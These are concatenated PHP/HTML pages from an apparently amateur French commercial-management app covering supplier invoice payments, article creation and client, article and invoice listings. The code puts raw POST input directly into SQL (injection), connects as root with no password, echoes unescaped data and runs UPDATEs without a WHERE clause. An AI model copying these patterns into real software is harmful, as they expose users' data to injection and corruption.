<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
$idfactfour = $_POST['idfactfour'];
$mode_reglement = $_POST['mode_reglement'];
$montant_reg1 = $_POST['montant_reg1'];
$montant_reg2 = $_POST['montant_reg2'];
$montant_reg3 = $_POST['montant_reg3'];
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$sql_reg_fact_four = "INSERT INTO `reg_fact_four`(`idregfactfour`, `idfactfour`, `mode_reglement`, `montant_reg1`, `montant_reg2`, `montant_reg3`) VALUES ('','$idfactfour','$mode_reglement',
'$montant_reg1','$montant_reg2','$montant_reg3')";
$sql_fact_four = mysql_query("SELECT * FROM fact_four WHERE idfactfour=".$idfactfour);
$donnee_fact_four = mysql_fetch_array($sql_fact_four);
$montant_total_reg = $montant_reg1+$montant_reg2+$montant_reg3;
if($donnee_fact_four['ptttc_fact_four'] != $montant_total_reg)
{
mysql_query("UPDATE fact_four SET etat_fact_four = 3");
}
else
{
mysql_query("UPDATE fact_four SET etat_fact_four = 4");
}
echo $sql_reg_fact_four;
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.facture.php">FACTURE</a></li>
<li><a href="reg.facture.php" class="active"><span class="semi-bold">Reglement Facture</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ACHAT - <span class="semi-bold">Reglement Facture</span></h3>
</div>
<?php
if($sql_reg_fact_four == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> Le Reglement de la facture N° <b>FACFOUR000<?php echo $idfactfour; ?></b> à été créer avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($sql_reg_fact_four == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une Erreur de type <b><?php echo $error; ?></b> s'est produit. Vérifier votre Code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
$designation = $_POST['desc_court'];
$idfamillearticle = $_POST['idfamillearticle'];
$idsousfamillearticle = $_POST['idsousfamillearticle'];
$idfournisseur = $_POST['idfournisseur'];
$ref_fournisseur = $_POST['ref_fournisseur'];
$ref_interne = $_POST['ref_interne'];
$date_debut = $_POST['date_debut'];
$date_fin = $_POST['date_fin'];
$duree_garantie = $_POST['duree_garantie'];
$num_serie = $_POST['num_serie'];
$code_barre = $_POST['code_barre'];
$desc_court = $_POST['desc_court'];
$desc_long = $_POST['desc_long'];
$poids = $_POST['poids'];
$prix_achat_ht = $_POST['prix_achat_ht'];
$prix_vente_ht = $_POST['prix_vente_ht'];
$prix_vente_ttc = $_POST['prix_vente_ttc'];
$stock_minima = $_POST['stock_minima'];
$stock_reel = $_POST['stock_reel'];
$images = $_POST['images'];
mysql_connect("localhost", "root", "");
mysql_select_db("gestion");
$sql_article = "INSERT INTO `article`(`idarticle`, `idfamillearticle`, `idsousfamillearticle`, `idfournisseur`, `ref_fournisseur`, `ref_interne`, `desc_court`, `desc_long`, `date_debut`, `date_fin`, `num_serie`, `poids`, `duree_garantie`, `stock_minima`, `stock_reel`, `code_barre`, `prix_achat_ht`, `prix_vente_ht`, `prix_vente_ttc`, `images`)
VALUES ('','$idfamillearticle','$idsousfamillearticle','$idfournisseur','$ref_fournisseur','$ref_interne','$desc_court','$desc_long','$date_debut','$date_fin','$num_serie','$poids','$duree_garantie','$stock_minima','$stock_reel','$code_barre','$prix_achat_ht','$prix_vente_ht','$prix_vente_ttc','$images')";
mysql_query($sql_article);
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php">Article</a></li>
<li><a href="nouv.client.php" class="active"><span class="semi-bold">Nouvel Article</span></a></li>
</ul>
<div class="page-title"> <i class="icon-custom-left"></i>
<h3>ARTICLE - <span class="semi-bold">Nouvel Article</span></h3>
</div>
<?php
if($sql_article == true){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-success fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> SUCCES!</h4>
<p> L'article' <b><?php echo $designation; ?></b> à été créé avec succès. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
<?php
if($sql_article == false){
?>
<div class="row">
<div class="col-md-12">
<div class="grid simple">
<div class="grid-body no-border">
<div class="row-fluid">
<div class="alert alert-block alert-error fade in">
<button data-dismiss="alert" class="close" type="button"></button>
<h4 class="alert-heading"><i class="icon-warning-sign"></i> ERROR!</h4>
<p> Une Erreur de type <b><?php echo $error; ?></b> s'est produite. Vérifier votre Code. </p>
</div>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
<!-- END CONTAINER -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
</body>
</html><file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php" class="active">Client</a></li>
</ul>
<div class="page-title"> <a href="<?php echo $rootsite; ?>"><i class="icon-custom-left"></i></a>
<h3>Donnée - <span class="semi-bold">Client</span></h3>
</div>
<div class="row-fluid">
<div class="span12">
<div class="grid simple ">
<div class="grid-title">
<h4>Liste des <span class="semi-bold">Clients</span> <a href="nouv.client.php"><button class="btn btn-primary btn-xs btn-mini" type="button">Nouveau Client</button></a></h4>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<table class="table table-striped" id="example2" >
<thead>
<tr>
<th>ID client</th>
<th>Identité</th>
<th>Adresse</th>
<th>Téléphone</th>
<th>Adresse Mail</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<?php
$sql_client = mysql_query("SELECT * FROM client");
while($donnee_client = mysql_fetch_array($sql_client))
{
?>
<tr class="odd gradeX">
<td>
<?php
if($donnee_client['nom'] == ""){echo "<i class=fa fa-exclamation></i>";}
if($donnee_client['prenom'] == ""){echo "<i class=fa fa-exclamation></i>";}
if($donnee_client['adresse1'] == ""){echo "<i class=fa fa-exclamation></i>";}
if($donnee_client['cp'] == ""){echo "<i class=fa fa-exclamation></i>";}
if($donnee_client['ville'] == ""){echo "<i class=fa fa-exclamation></i>";}
if($donnee_client['tel'] == ""){echo "<i class=fa fa-exclamation></i>";}
if($donnee_client['mail'] == ""){echo "<i class=fa fa-exclamation></i>";}
?>
CLT000<?php echo $donnee_client['idclient']; ?></td>
<td>
<?php
if($donnee_client['civilite'] == 1){echo "M.";}
if($donnee_client['civilite'] == 2){echo "Mme.";}
if($donnee_client['civilite'] == 3){echo "Mlle.";}
if($donnee_client['civilite'] == 4){echo "Entreprise";}
if($donnee_client['civilite'] == 5){echo "SARL.";}
if($donnee_client['civilite'] == 6){echo "SA.";}
if($donnee_client['civilite'] == 7){echo "EURL.";}
if($donnee_client['civilite'] == 8){echo "SAS.";}
?>
<?php echo $donnee_client['nom']; ?> <?php echo $donnee_client['prenom']; ?><br><br>
<i>Raison Social:<br>
<?php
if($donnee_client['raison_social'] == ""){echo "<b>Particulier</b>";}else{echo "<b>".$donnee_client['raison_social']."</b>";}
?>
</td>
<td>
<?php echo $donnee_client['adresse1']; ?><br>
<?php echo $donnee_client['adresse2']; ?><br>
<?php echo $donnee_client['cp']; ?> <?php echo $donnee_client['ville']; ?>
</td>
<td class="center">
Tel: <?php echo $donnee_client['tel']; ?><br>
Fax: <?php echo $donnee_client['fax']; ?><br>
Port: <?php echo $donnee_client['port']; ?>
</td>
<td class="center"><?php echo $donnee_client['mail']; ?></td>
<td class="center">
<a href="modif.client.php?idclient=<?php echo $donnee_client['idclient']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-paste"></i> Editer</button></a>
<a href="fiche.client.php?idclient=<?php echo $donnee_client['idclient']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eye"></i> Fiche Client</button></a>
<a href="supp.client.php?idclient=<?php echo $donnee_client['idclient']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eraser"></i> Supprimer</button>
</td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html>
<file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">Donnée</a> </li>
<li><a href="index.php" class="active">Article</a></li>
</ul>
<div class="page-title"> <a href="<?php echo $rootsite; ?>"><i class="icon-custom-left"></i></a>
<h3>Donnée - <span class="semi-bold">Article</span></h3>
</div>
<div class="row-fluid">
<div class="span12">
<div class="grid simple ">
<div class="grid-title">
<h4>Liste des <span class="semi-bold">Article</span> <a href="nouv.article.php"><button class="btn btn-primary btn-xs btn-mini" type="button">Nouvel Article</button></a></h4>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<table class="table table-striped" id="example2" >
<thead>
<tr>
<th>ID article</th>
<th>Visuel</th>
<th>Désignation</th>
<th>Prix Vente TTC</th>
<th>Stock</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<?php
$sql_article = mysql_query("SELECT * FROM article");
while($donnee_article = mysql_fetch_array($sql_article))
{
?>
<tr class="odd gradeX">
<td><?php echo "ART000".$donnee_article['idarticle']; ?><br><?php echo $donnee_article['ref_interne']; ?></td>
<td><img width="150px" height="115px" src="<?php echo $donnee_article['images']; ?>" /></td>
<td><?php echo $donnee_article['desc_court']; ?></td>
<td><?php echo $donnee_article['prix_vente_ttc']; ?> €</td>
<td>
<?php
if($donnee_article['stock_reel'] > 1){echo "<button type='button' data-target='#myModal' class='btn btn-white tip' data-toggle='tooltip' title='En Stock'' data-placement='right'><img src='".$rootsite."/assets/img/icon/stock-green.png' /></button>";}
elseif($donnee_article['stock_reel'] == 1) {echo "<button type='button' data-target='#myModal' class='btn btn-white tip' data-toggle='tooltip' title='A Commander'' data-placement='right'><img src='".$rootsite."/assets/img/icon/stock-warning.png' /></button>";}
elseif($donnee_article['stock_reel'] < 1 ) {echo "<button type='button' data-target='#myModal' class='btn btn-white tip' data-toggle='tooltip' title='RUPTURE'' data-placement='right'><img src='".$rootsite."/assets/img/icon/stock-danger.png' /></button>";}
?>
<div aria-hidden="true" aria-labelledby="myModalLabel" role="dialog" tabindex="-1" id="myModal" class="modal fade" style="display: none;">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button aria-hidden="true" data-dismiss="modal" class="close" type="button">×</button>
<br>
<i class="icon-credit-card icon-7x"></i>
<h4 class="semi-bold" id="myModalLabel">Information de Stock</h4>
<br>
</div>
<div class="modal-body">
<img src="<?php echo $rootsite; ?>/assets/img/icon/stock-green.png" />: <b>EN STOCK</b><br><p>Le stock de Produit est supérieur au minima de commande du dit produit. <u>Aucune commande nécessaire</u>.</p><br><br>
<img src="<?php echo $rootsite; ?>/assets/img/icon/stock-warning.png" />: <b>STOCK BAS</b><br><p>Le Produit est encore en stock mais il est soit réservé ou pratiquement en rupture. <u>Commande Nécessaire</u>.</p><br><br>
<img src="<?php echo $rootsite; ?>/assets/img/icon/stock-danger.png" />: <b>RUPTURE</b><br><p>Le produit n'est plus en stock, soit il est directemet en rupture chez le fournisseur ou une commande est nécessaire. <u>Commande nécessaire</u>.</p>
</div>
<div class="modal-footer">
</div>
</div>
<!-- /.modal-content -->
</div>
<!-- /.modal-dialog -->
</div>
</td>
<td>
<a href="modif.article.php?idarticle=<?php echo $donnee_article['idarticle']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-paste"></i> Editer</button></a>
<a href="fiche.article.php?idarticle=<?php echo $donnee_article['idarticle']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eye"></i> Fiche Article</button></a>
<a href="supp.article.php?idarticle=<?php echo $donnee_article['idarticle']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eraser"></i> Supprimer</button>
</td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/pace/pace.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-mixitup/jquery.mixitup.min.js" type="text/javascript"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/messages_notifications.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/search_results.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html>
<file_sep><?php
include ('../../../inc/header.php');
include ('../../../inc/pagecontainer.php');
$date = date("d-m-Y");
$date_liv_poss = date('d-m-Y', strtotime("+2 days"));
?>
<!-- BEGIN PAGE CONTAINER-->
<div class="page-content">
<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
<div id="portlet-config" class="modal hide">
<div class="modal-header">
<button data-dismiss="modal" class="close" type="button"></button>
<h3>Widget Settings</h3>
</div>
<div class="modal-body"> Widget settings form goes here </div>
</div>
<div class="clearfix"></div>
<div class="content">
<ul class="breadcrumb">
<li>
<p>VOUS ETES ICI</p>
</li>
<li><a href="#">ACHAT</a> </li>
<li><a href="index.facture.php" class="active">FACTURE</a></li>
</ul>
<div class="page-title"> <a href="<?php echo $rootsite; ?>"><i class="icon-custom-left"></i></a>
<h3>Achat - <span class="semi-bold">FACTURE</span></h3>
</div>
<div class="row-fluid">
<div class="span12">
<div class="grid simple ">
<div class="grid-title">
<h4>Liste des <span class="semi-bold">Facture Fournisseur</span></h4>
<a href="nouv.facture.php"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-plus"></i> Nouvelle Facture</button></a>
<div class="tools"> <a href="javascript:;" class="collapse"></a> <a href="#grid-config" data-toggle="modal" class="config"></a> <a href="javascript:;" class="reload"></a> <a href="javascript:;" class="remove"></a> </div>
</div>
<div class="grid-body ">
<table class="table table-striped" id="example2" >
<thead>
<tr>
<th>ID Facture</th>
<th>Date de la facture</th>
<th>Fournisseur</th>
<th>Prix Total TTC</th>
<th>Action</th>
<th HIDDEN>Etat</th>
</tr>
</thead>
<tbody>
<?php
$sql_fact_four = mysql_query("SELECT * FROM fact_four, fournisseur WHERE fact_four.idfournisseur = fournisseur.idfournisseur");
while($donnee_fact_four = mysql_fetch_array($sql_fact_four))
{
?>
<tr class="odd gradeX">
<td>FACTFOUR000<?php echo $donnee_fact_four['idfactfour']; ?></td>
<td><?php echo $donnee_fact_four['date_fact_four']; ?></td>
<td><?php echo $donnee_fact_four['raison_social']; ?></td>
<td><?php echo $donnee_fact_four['ptttc_fact_four']; ?> €</td>
<td>
<a href="fiche.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eye"></i> Fiche Facture</button></a>
<a href="supp.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"><button class="btn btn-primary btn-cons" type="button"><i class="fa fa-eraser"></i> Supprimer</button></a>
<a href="reg.facture.php?idfactfour=<?php echo $donnee_fact_four['idfactfour']; ?>"><button class="btn btn-danger btn-cons" type="button"><i class="fa fa-credit-card"></i> Reglement</button></a>
</td>
<td HIDDEN>
<?php
switch($donnee_fact_four['etat_fact_four'])
{
case 1:
echo "<p class='text-info'>Facture Edité</p>";
break;
case 2:
echo "<p class='text-warning'>Facture en attente de paiement</p>";
break;
case 3:
echo "<p class='text-warning'>Facture partiellement Payé</p>";
break;
case 4:
echo "<p class='text-succes'>Facture payé</p>";
break;
}
?>
</td>
</tr>
<?php } ?>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- END PAGE -->
<!-- END CONTAINER -->
<!-- BEGIN CORE JS FRAMEWORK-->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-1.8.3.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-ui/jquery-ui-1.10.1.custom.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/breakpoints.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-unveil/jquery.unveil.min.js" type="text/javascript"></script>
<!-- END CORE JS FRAMEWORK -->
<!-- BEGIN PAGE LEVEL JS -->
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-block-ui/jqueryblockui.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slider/jquery.sidr.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-numberAnimate/jquery.animateNumbers.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/bootstrap-select2/select2.min.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/js/jquery.dataTables.min.js" type="text/javascript" ></script>
<script src="<?php echo $rootsite; ?>assets/plugins/jquery-datatable/extra/js/TableTools.min.js" type="text/javascript" ></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/datatables.responsive.js"></script>
<script type="text/javascript" src="<?php echo $rootsite; ?>assets/plugins/datatables-responsive/js/lodash.min.js"></script>
<!-- END PAGE LEVEL PLUGINS -->
<script src="<?php echo $rootsite; ?>assets/js/datatables.js" type="text/javascript"></script>
<!-- BEGIN CORE TEMPLATE JS -->
<script src="<?php echo $rootsite; ?>assets/js/core.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/chat.js" type="text/javascript"></script>
<script src="<?php echo $rootsite; ?>assets/js/demo.js" type="text/javascript"></script>
<!-- END CORE TEMPLATE JS -->
<!-- END JAVASCRIPTS -->
</body>
</html>
<file_sep><?php
session_start();
if (!isset($_SESSION['login'])) {
header ('Location: login.php');
exit();
}
include ('config.php');
$result = mysql_query("SELECT iduser,login,images,nom,prenom,place FROM membre WHERE login = '".$_SESSION['login']. "'") or die(mysql_error());
$donnees_login = mysql_fetch_array($result);
?>
<!DOCTYPE html>
<html>
<head>
<title>LSI - GESTION COMMERCIALE</title>
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" />
<meta content="" name="description" />
<meta content="" name="author" />
<link href="<?php echo $rootsite; ?>assets/plugins/pace/pace-theme-flash.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/jquery-slider/css/jquery.sidr.light.css" rel="stylesheet" type="text/css" media="screen"/>
<link href="<?php echo $rootsite; ?>assets/plugins/boostrapv3/css/bootstrap.min.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/boostrapv3/css/bootstrap-theme.min.css" rel="stylesheet" type="text/css"/>
<link href="<?php echo $rootsite; ?>assets/plugins/bootstrap-datepicker/css/datepicker.css" rel="stylesheet" type="text/css" />
<link href="<?php echo $rootsite; ?>assets/plugins/font-awesome/css/font-awesome.css" rel="stylesheet" type="text/css"/>
